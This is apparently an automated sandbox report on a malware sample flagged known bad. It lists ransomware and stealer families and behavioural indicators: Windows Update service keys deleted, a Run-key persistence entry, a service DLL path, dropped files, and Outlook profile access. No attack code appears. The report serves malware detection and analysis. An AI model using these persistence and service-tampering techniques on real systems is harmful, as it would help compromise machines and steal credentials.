Analysis Overview
SHA256
e1fc354c5a9b2177a35a329058f92f08f21165c88d7566ed2f6c74d0d1eb4ace
Threat Level: Known bad
The file 4cb907abf1db2b4b0fe03ed3c65097e3.bin was found to be: Known bad.
Malicious Activity Summary
Djvu Ransomware
DcRat
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Modifies security service
SmokeLoader
Detected Djvu ransomware
Amadey
Detect rhadamanthys stealer shellcode
Sets service image path in registry
Blocklisted process makes network request
Downloads MZ/PE file
Sets DLL path for service in the registry
Stops running service(s)
Checks computer location settings
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
Loads dropped DLL
Accesses 2FA software files, possible credential harvesting
Accesses Microsoft Outlook accounts
Accesses Microsoft Outlook profiles
Checks installed software on the system
Adds Run key to start application
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Creates scheduled task(s)
outlook_office_path
outlook_win_path
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-28 01:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-28 01:33
Reported
2023-03-28 01:35
Platform
win7-20230220-en
Max time kernel
150s
Max time network
34s
Command Line
Signatures
SmokeLoader
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe
"C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe"
Network
Files
memory/1308-55-0x0000000000220000-0x0000000000229000-memory.dmp
memory/1208-56-0x0000000002BB0000-0x0000000002BC6000-memory.dmp
memory/1308-57-0x0000000000400000-0x0000000002B72000-memory.dmp
memory/1208-60-0x000007FE88710000-0x000007FE8871A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-28 01:33
Reported
2023-03-28 01:35
Platform
win10v2004-20230220-en
Max time kernel
112s
Max time network
152s
Command Line
Signatures
Amadey
DcRat
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
Rhadamanthys
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
| PID 2708 created 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
Vidar
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Sets DLL path for service in the registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Onix32\Parameters\ServiceDll = "C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\Onix32.dll" | C:\Windows\SysWOW64\rundll32.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Onix32\ImagePath = "C:\\Windows\\system32\\svchost.exe -k LocalService" | C:\Windows\SysWOW64\rundll32.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\223.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\223.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\37CD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\447.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\257D.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\257D.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4AAE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\447.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Player3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\37CD.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\rundll32.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Windows\system32\dllhost.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0ed36631-a8e4-4f70-b931-251fc97814c5\\447.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\447.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\810.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\810.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\810.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icucnv40.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\LICENSE.txt | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\ADelRCP.exe | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Compare_R_RHP.aapp | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\turnOnNotificationInAcrobat.gif | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\selection-actions2x.png | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\icucnv40.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\eula.ini | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icudt40.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\download.svg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Onix32.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\icudt40.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\s_agreement_filetype.svg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\cryptocme.sig | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_agreement_filetype.svg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\download.svg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Accessibility.api | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | C:\Windows\SysWOW64\rundll32.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\3C23.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\3C23.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\3C23.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\SysWOW64\rundll32.exe | N/A |
